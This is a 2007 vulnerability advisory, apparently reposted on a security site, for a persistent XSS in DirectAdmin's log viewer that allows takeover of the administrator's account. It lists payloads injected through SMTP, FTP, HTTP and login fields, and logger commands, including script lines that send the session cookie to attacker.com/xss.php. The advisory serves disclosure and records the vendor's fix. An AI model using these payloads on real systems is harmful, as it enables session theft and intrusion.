DirectAdmin persistant XSS [takeover an Administrator`s account]

Advisory Content :

+ Subject:
DirectAdmin persistant XSS [takeover an Administrator`s account]

+ Version:
< DirectAdmin 1.29.3

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ DirectAdmin Description:
DirectAdmin is a popular, advanced Web Control Panel with many features
for webhosting. www.directadmin.com

+ Persistant XSS Description:
It is possible to take over an Administrator`s account by injecting
persistent XSS data to the System Logs [/var/log/*].
When DirectAdmin's Administrator goes to Admin Tools/Log Viewer and press
"Show log" to display logs - he can be a victim of XSS attack and his
session can be easily taken over - which means that it is possible to run
any command with DirectAdmin's Administrator priviliges.

I found out that 7 from 15 log files in the menu, could be used as means
of injecting XSS to a system with no login credentials required.
Next 3 of them are possible to be injected when you are logged as a valid
user in the DirectAdmin.

I was testing DirectAdmin on default Debian 4.0 installation but in
general it should be working for other platforms too (with small changes I

guess).

Details:

I) Examples of an attack without login credentials:

1)
Log file: /var/log/exim/rejectlog, /var/log/exim/mainlog

Data is sent to IP with DirectAdmin to port 25:
vrfy </textarea><script>alert('0wned:'+escape(document.cookie));</script>

Lines in log files:
mainlog: 2007-03-23 19:24:49 H=attacker.com [123.123.123.123] rejected
VRFY </textarea><script>alert('0wned:'+escape(document.cookie));</script>
rejectlog: 2007-03-23 19:24:49 H=attacker.com [123.123.123.123] rejected
VRFY </textarea><script>alert('0wned:'+escape(document.cookie));</script>

2)
Log file: /var/log/proftpd/auth.log

Data is sent to IP with DirectAdmin to port 21:
user </textarea><script>alert('0wned:'+escape(document.cookie));</script>

Lines in log files:
auth.log:ProFTPd [28114] 123.123.123.123 [23/Mar/2007:19:29:26 +0100]
"USER </textarea><script>alert('0wned:'+escape(document.cookie));</script>"
331

3)
Log file: /var/log/httpd/error_log

Data is sent to IP with DirectAdmin to port 80:
GET / </textarea><script>alert('0wned:'+escape(document.cookie));</script>

Lines in log files:
error_log:[Fri Mar 23 19:33:37 2007] [error] [client 123.123.123.123]
request failed: erroneous characters after protocol string: GET /
</textarea><script>alert('0wned:'+escape(document.cookie));</script>

4)
Log file: /var/log/httpd/access_Log

Data is sent to "free (not attached to any user)" IP to port 80 (using
wget):
wget IP
--user-agent="</textarea><script>alert('0wned:'+escape(document.cookie))
;</script>"

Lines in log files:
access_log:123.123.123.123 - - [23/Mar/2007:19:36:46 +0100] "GET /
HTTP/1.0" 200 2673 "-"
"</textarea><script>alert('0wned:'+escape(document.cookie));</script>"

5)
Log file: /var/log/directadmin/error.log

Data is sent to first DirectAdmin login page:
login:
</textarea><script>alert('0wned:'+escape(document.cookie));</script>
password: any (not empty)

Lines in log files:
error.log:2007:03:23-19:39:44: Auth::passValid: unable to get user_info
for </textarea><script>alert('0wned:'+escape(document.cookie));</script>

6)
Log file: /var/log/directadmin/security.log

Data is sent to first DirectAdmin login page:
login:
</textarea><script>alert('0wned:'+escape(document.cookie));</script>

Lines in log files:
security.log:2007:03:23-19:39:44: *** 123.123.123.123 has tried to login
with an invalid username:
'</textarea><script>alert('0wned:'+escape(document.cookie));</script>' ***

II) Examples of an attack with login credentials:

1)
Log file: /var/log/directadmin/security.log
Via WWW:
http://directadminsite:2222/CMD_ADDITIONAL_DOMAINS?domain=login.domain.c
om</textarea><script>alert('XSS');</script>

Via ftp login: lftp login@directadmin:/> get
"</textarea><script>location.href='http://attacker.com/xss.php?cook='+es
cape(document.cookie)</script>"

2)
Log file: /var/log/messages
via php: <?php system('/usr/bin/logger
"</textarea><script>location.href='http://attacker.com/xss.php?cook='+
escape(document.cookie)</script>"');
?>

3)
Log file: /var/log/messages
via ssh: /usr/bin/logger
"</textarea><script>location.href='http://attacker.com/xss.php?cook='+es
cape(document.cookie)</script>"

Timeline:
2007.02.25 bug discovered
2007.03.00 bug tested
2007.03.23 bug sent via Technical Support mail from
http://www.directadmin.com/support.html
2007.03.24 fast response after few hours from DirectAdmin : Thanks for the
report. Fix will be out within a few hours with DA 1.29.3
2007.03.24 DirectAdmin 1.29.3 Patched - Overview : use html characters for
log viewer, Description: Ensure all charcters are html encoded when viewing
logs through the log viewer.

Original Advisory:
http://kaneda.bohater.net/security/20070323-directadmin_persistant_xss_t
akeover_administrator_account.php

--
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
..
[+] You can take our lives,but you will never take our Freedom - W.Wallace
[+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama
[+] Revolution the only solution - System of a down...
[+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0
[-] Kanedaaa... Bohateur... Cucumber Team Member... kaneda (at) bohater
(dot) net [email concealed]

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

DirectAdmin persistant XSS [takeover an Administrator`s account]